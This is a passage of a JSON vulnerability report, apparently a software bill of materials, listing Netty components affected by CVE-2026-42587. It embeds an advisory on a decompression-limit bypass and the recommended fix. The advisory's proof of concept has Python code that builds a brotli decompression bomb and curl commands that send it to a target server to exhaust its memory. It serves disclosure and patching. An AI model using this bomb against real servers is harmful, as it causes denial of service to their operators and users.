          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#b028b582-7e33-4057-9d6d-d19dcb233ffe"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#b028b582-7e33-4057-9d6d-d19dcb233ffe"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#b028b582-7e33-4057-9d6d-d19dcb233ffe"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#2bd90c0a-86ae-463b-97bb-f93bb1d18f4e"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#2bd90c0a-86ae-463b-97bb-f93bb1d18f4e"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#2bd90c0a-86ae-463b-97bb-f93bb1d18f4e"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#2bd90c0a-86ae-463b-97bb-f93bb1d18f4e"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#2bd90c0a-86ae-463b-97bb-f93bb1d18f4e"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#2bd90c0a-86ae-463b-97bb-f93bb1d18f4e"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#2bd90c0a-86ae-463b-97bb-f93bb1d18f4e"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#142eb783-0a5b-400f-9449-340271c21d69"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#142eb783-0a5b-400f-9449-340271c21d69"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#142eb783-0a5b-400f-9449-340271c21d69"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#142eb783-0a5b-400f-9449-340271c21d69"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#142eb783-0a5b-400f-9449-340271c21d69"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#142eb783-0a5b-400f-9449-340271c21d69"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#142eb783-0a5b-400f-9449-340271c21d69"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1d097b2e-6838-41d5-8d1a-79c288a7825a"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1d097b2e-6838-41d5-8d1a-79c288a7825a"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1d097b2e-6838-41d5-8d1a-79c288a7825a"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1d097b2e-6838-41d5-8d1a-79c288a7825a"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1d097b2e-6838-41d5-8d1a-79c288a7825a"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1d097b2e-6838-41d5-8d1a-79c288a7825a"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1d097b2e-6838-41d5-8d1a-79c288a7825a"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#77ca2ddb-5012-4174-afdb-30367289d47f"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#77ca2ddb-5012-4174-afdb-30367289d47f"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#77ca2ddb-5012-4174-afdb-30367289d47f"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#77ca2ddb-5012-4174-afdb-30367289d47f"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#77ca2ddb-5012-4174-afdb-30367289d47f"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#77ca2ddb-5012-4174-afdb-30367289d47f"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#77ca2ddb-5012-4174-afdb-30367289d47f"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#7df636d8-c360-40aa-a31a-8bada79ec518"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#7df636d8-c360-40aa-a31a-8bada79ec518"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#7df636d8-c360-40aa-a31a-8bada79ec518"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#7df636d8-c360-40aa-a31a-8bada79ec518"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#7df636d8-c360-40aa-a31a-8bada79ec518"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#7df636d8-c360-40aa-a31a-8bada79ec518"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#7df636d8-c360-40aa-a31a-8bada79ec518"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-42587",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "description": "## Summary\n\n`HttpContentDecompressor` accepts a `maxAllocation` parameter to limit decompression buffer size and prevent decompression bomb attacks. This limit is correctly enforced for gzip and deflate encodings via `ZlibDecoder`, but is silently ignored when the content encoding is `br` (Brotli), `zstd`, or `snappy`. An attacker can bypass the configured decompression limit by sending a compressed payload with `Content-Encoding: br` instead of `Content-Encoding: gzip`, causing unbounded memory allocation and out-of-memory denial of service.\n\nThe same vulnerability exists in `DelegatingDecompressorFrameListener` for HTTP/2 connections.\n\n## Details\n\n`HttpContentDecompressor` stores the `maxAllocation` value at construction time (`HttpContentDecompressor.java:89`) and uses it in `newContentDecoder()` to create the appropriate decompression handler.\n\nFor gzip/deflate, `maxAllocation` is forwarded to `ZlibCodecFactory.newZlibDecoder()`:\n\n```java\n// HttpContentDecompressor.java:101 \u2014 maxAllocation IS enforced\n.handlers(ZlibCodecFactory.newZlibDecoder(ZlibWrapper.GZIP, maxAllocation))\n```\n\n`ZlibDecoder.prepareDecompressBuffer()` enforces this as a hard cap by setting the buffer's `maxCapacity` and throwing `DecompressionException` when the limit is reached:\n\n```java\n// ZlibDecoder.java:68 \u2014 hard limit on buffer capacity\nreturn ctx.alloc().heapBuffer(Math.min(preferredSize, maxAllocation), maxAllocation);\n// ZlibDecoder.java:80 \u2014 throws when exceeded\nthrow new DecompressionException(\"Decompression buffer has reached maximum size: \" + buffer.maxCapacity());\n```\n\nFor brotli, zstd, and snappy, the decoders are created without any size limit:\n\n```java\n// HttpContentDecompressor.java:120 \u2014 maxAllocation IGNORED\n.handlers(new BrotliDecoder())\n\n// HttpContentDecompressor.java:129 \u2014 maxAllocation IGNORED\n.handlers(new SnappyFrameDecoder())\n\n// HttpContentDecompressor.java:138 \u2014 maxAllocation 
IGNORED\n.handlers(new ZstdDecoder())\n```\n\n`BrotliDecoder` has no `maxAllocation` parameter at all \u2014 there is no way to constrain its output. It streams decompressed data in chunks via `fireChannelRead` with no total limit.\n\n`ZstdDecoder()` defaults to a 4MB `maximumAllocationSize`, but this only constrains individual buffer allocations, not total output. The decode loop (`ZstdDecoder.java:100-114`) creates new buffers and fires `channelRead` repeatedly, so total decompressed output is unbounded.\n\nThe identical pattern exists in `DelegatingDecompressorFrameListener.newContentDecompressor()` at lines 188-210 for HTTP/2.\n\n## PoC\n\n1. Configure a Netty HTTP server with decompression bomb protection:\n\n```java\npipeline.addLast(new HttpContentDecompressor(1048576)); // 1MB max\npipeline.addLast(new HttpObjectAggregator(1048576));     // 1MB max\n```\n\n2. Generate a brotli-compressed bomb (~1KB compressed \u2192 1GB decompressed):\n\n```python\nimport brotli\nbomb = b'\\x00' * (1024 * 1024 * 1024)  # 1GB of zeros\ncompressed = brotli.compress(bomb, quality=11)\nwith open('bomb.br', 'wb') as f:\n    f.write(compressed)\n# compressed size: ~1KB\n```\n\n3. Send the bomb with gzip encoding (BLOCKED by maxAllocation):\n\n```bash\n# This is caught \u2014 ZlibDecoder enforces the 1MB limit\ncurl -X POST http://target:8080/api \\\n  -H 'Content-Encoding: gzip' \\\n  --data-binary @bomb.gz\n# Result: DecompressionException thrown at 1MB\n```\n\n4. Send the same bomb with brotli encoding (BYPASSES maxAllocation):\n\n```bash\n# This bypasses the limit \u2014 BrotliDecoder has no maxAllocation\ncurl -X POST http://target:8080/api \\\n  -H 'Content-Encoding: br' \\\n  --data-binary @bomb.br\n# Result: Full 1GB decompressed into memory \u2192 OOM\n```\n\n5. 
The same bypass works with `Content-Encoding: zstd` and `Content-Encoding: snappy`.\n\n## Impact\n\n- **Denial of Service**: An attacker can cause out-of-memory conditions on any Netty server that relies on `maxAllocation` for decompression bomb protection, by simply using a non-gzip content encoding.\n- **False sense of security**: Developers who explicitly configure `maxAllocation` to protect against decompression bombs are not actually protected for brotli, zstd, or snappy encodings. The API documentation implies all encodings are covered.\n- **Trivial bypass**: The attacker only needs to change one HTTP header (`Content-Encoding: br` instead of `Content-Encoding: gzip`) to circumvent the protection entirely.\n- **Both HTTP/1.1 and HTTP/2**: The vulnerability exists in both `HttpContentDecompressor` (HTTP/1.1) and `DelegatingDecompressorFrameListener` (HTTP/2).\n\n## Recommended Fix\n\nPass `maxAllocation` to all decoder constructors. For `BrotliDecoder`, which currently has no `maxAllocation` support, add the parameter:\n\n**HttpContentDecompressor.java** \u2014 pass maxAllocation to all decoders:\n\n```java\n// Line 120: BrotliDecoder \u2014 add maxAllocation support\n.handlers(new BrotliDecoder(maxAllocation))\n\n// Line 129: SnappyFrameDecoder \u2014 add maxAllocation support\n.handlers(new SnappyFrameDecoder(maxAllocation))\n\n// Line 138: ZstdDecoder \u2014 forward the configured maxAllocation\n.handlers(new ZstdDecoder(maxAllocation))\n```\n\n**DelegatingDecompressorFrameListener.java** \u2014 same fix at lines 188-210.\n\n**BrotliDecoder** \u2014 add `maxAllocation` parameter with the same semantics as `ZlibDecoder.prepareDecompressBuffer()`: set buffer maxCapacity and throw `DecompressionException` when the total decompressed output exceeds the limit.\n\n**SnappyFrameDecoder** \u2014 add `maxAllocation` parameter with equivalent enforcement.\n\n**ZstdDecoder** \u2014 ensure that when `maxAllocation` is set, total output across all buffers is bounded 
(not just per-buffer allocation size).",
      "recommendation": "Upgrade io.netty:netty-codec-http to version 4.1.133.Final (4.1.x line) or 4.2.13.Final (4.2.x line); upgrade io.netty:netty-codec-http2 to version 4.1.133.Final (4.1.x line) or 4.2.13.Final (4.2.x line)",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-42587"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-f6hv-jmp6-3vwv"
        }
      ],
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-http2@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http2@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http2@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http2@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#540e52db-abb1-48d9-a50b-9b89f495c3c7"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4d7ce0b3-39fe-493c-bc80-99876475919a"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#540e52db-abb1-48d9-a50b-9b89f495c3c7"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#540e52db-abb1-48d9-a50b-9b89f495c3c7"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4d7ce0b3-39fe-493c-bc80-99876475919a"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4d7ce0b3-39fe-493c-bc80-99876475919a"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4d7ce0b3-39fe-493c-bc80-99876475919a"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#540e52db-abb1-48d9-a50b-9b89f495c3c7"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4d7ce0b3-39fe-493c-bc80-99876475919a"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4d7ce0b3-39fe-493c-bc80-99876475919a"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4d7ce0b3-39fe-493c-bc80-99876475919a"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#0e02b9e7-23db-433d-bec3-3b14e9c311f3"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#2e288e32-c573-4f1a-9eca-dd0e589291ca"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#0e02b9e7-23db-433d-bec3-3b14e9c311f3"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#0e02b9e7-23db-433d-bec3-3b14e9c311f3"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#2e288e32-c573-4f1a-9eca-dd0e589291ca"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#2e288e32-c573-4f1a-9eca-dd0e589291ca"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#2e288e32-c573-4f1a-9eca-dd0e589291ca"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#0e02b9e7-23db-433d-bec3-3b14e9c311f3"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#2e288e32-c573-4f1a-9eca-dd0e589291ca"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#2e288e32-c573-4f1a-9eca-dd0e589291ca"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#2e288e32-c573-4f1a-9eca-dd0e589291ca"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#47f1a52d-2d54-4870-a4c6-d6be0e3edd23"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#47f1a52d-2d54-4870-a4c6-d6be0e3edd23"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#47f1a52d-2d54-4870-a4c6-d6be0e3edd23"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#47f1a52d-2d54-4870-a4c6-d6be0e3edd23"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#47f1a52d-2d54-4870-a4c6-d6be0e3edd23"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#47f1a52d-2d54-4870-a4c6-d6be0e3edd23"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#47f1a52d-2d54-4870-a4c6-d6be0e3edd23"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#729b36ac-f61c-4af9-992b-191847755d85"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#729b36ac-f61c-4af9-992b-191847755d85"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#729b36ac-f61c-4af9-992b-191847755d85"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#729b36ac-f61c-4af9-992b-191847755d85"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#729b36ac-f61c-4af9-992b-191847755d85"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#729b36ac-f61c-4af9-992b-191847755d85"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#729b36ac-f61c-4af9-992b-191847755d85"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#4e279986-5752-4b93-9f99-e67176e42bb0"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#1379fc43-b58d-4eaa-9588-f77e3393bb6b"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#4e279986-5752-4b93-9f99-e67176e42bb0"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#4e279986-5752-4b93-9f99-e67176e42bb0"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#1379fc43-b58d-4eaa-9588-f77e3393bb6b"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#1379fc43-b58d-4eaa-9588-f77e3393bb6b"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#1379fc43-b58d-4eaa-9588-f77e3393bb6b"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#4e279986-5752-4b93-9f99-e67176e42bb0"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#1379fc43-b58d-4eaa-9588-f77e3393bb6b"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#1379fc43-b58d-4eaa-9588-f77e3393bb6b"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#1379fc43-b58d-4eaa-9588-f77e3393bb6b"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#3ad287ba-29f8-47a4-9fdd-cdc6bf54d6ee"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#13b04c78-11a2-49c3-a694-0ecfd36fc7ce"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#3ad287ba-29f8-47a4-9fdd-cdc6bf54d6ee"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#3ad287ba-29f8-47a4-9fdd-cdc6bf54d6ee"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#13b04c78-11a2-49c3-a694-0ecfd36fc7ce"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#13b04c78-11a2-49c3-a694-0ecfd36fc7ce"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#13b04c78-11a2-49c3-a694-0ecfd36fc7ce"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#3ad287ba-29f8-47a4-9fdd-cdc6bf54d6ee"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#13b04c78-11a2-49c3-a694-0ecfd36fc7ce"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#13b04c78-11a2-49c3-a694-0ecfd36fc7ce"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#13b04c78-11a2-49c3-a694-0ecfd36fc7ce"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#25be6a4b-fbcc-48f1-9947-6257a9d096c2"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#25be6a4b-fbcc-48f1-9947-6257a9d096c2"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#25be6a4b-fbcc-48f1-9947-6257a9d096c2"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#25be6a4b-fbcc-48f1-9947-6257a9d096c2"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#25be6a4b-fbcc-48f1-9947-6257a9d096c2"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#25be6a4b-fbcc-48f1-9947-6257a9d096c2"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#25be6a4b-fbcc-48f1-9947-6257a9d096c2"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#61c91d25-b0e0-4ce6-9bf8-37a0aa7b094f"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#61c91d25-b0e0-4ce6-9bf8-37a0aa7b094f"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#61c91d25-b0e0-4ce6-9bf8-37a0aa7b094f"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#61c91d25-b0e0-4ce6-9bf8-37a0aa7b094f"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#61c91d25-b0e0-4ce6-9bf8-37a0aa7b094f"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#61c91d25-b0e0-4ce6-9bf8-37a0aa7b094f"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#61c91d25-b0e0-4ce6-9bf8-37a0aa7b094f"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#21edbe28-c7a0-401a-a6f3-9082bf6112d8"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#21edbe28-c7a0-401a-a6f3-9082bf6112d8"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#21edbe28-c7a0-401a-a6f3-9082bf6112d8"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#21edbe28-c7a0-401a-a6f3-9082bf6112d8"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#21edbe28-c7a0-401a-a6f3-9082bf6112d8"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#21edbe28-c7a0-401a-a6f3-9082bf6112d8"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#21edbe28-c7a0-401a-a6f3-9082bf6112d8"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#fbe4656c-3fd5-4515-ab7f-a6cc817aec0e"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
